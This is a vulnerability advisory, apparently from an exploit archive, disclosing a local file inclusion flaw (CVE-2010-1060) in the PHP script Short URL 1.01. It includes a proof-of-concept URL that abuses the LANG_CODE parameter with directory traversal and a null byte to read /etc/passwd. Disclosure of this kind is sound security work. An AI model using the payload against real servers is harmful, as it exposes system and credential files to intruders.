Bug: Short URL 1.01 local file inclusion (WLB-2010030073 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Short URL 1.01 local file inclusion
 Credit: Securitylab
 Date: 2010.03.17
 CWE: CWE-22 (Show similar)
 CVE: CVE-2010-1060 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes


#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################

References:

http://www.securityfocus.com/bid/38731
http://www.exploit-db.com/exploits/11775
http://secunia.com/advisories/38968
http://packetstormsecurity.org/1003-exploits/shorturl-lfi.txt

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com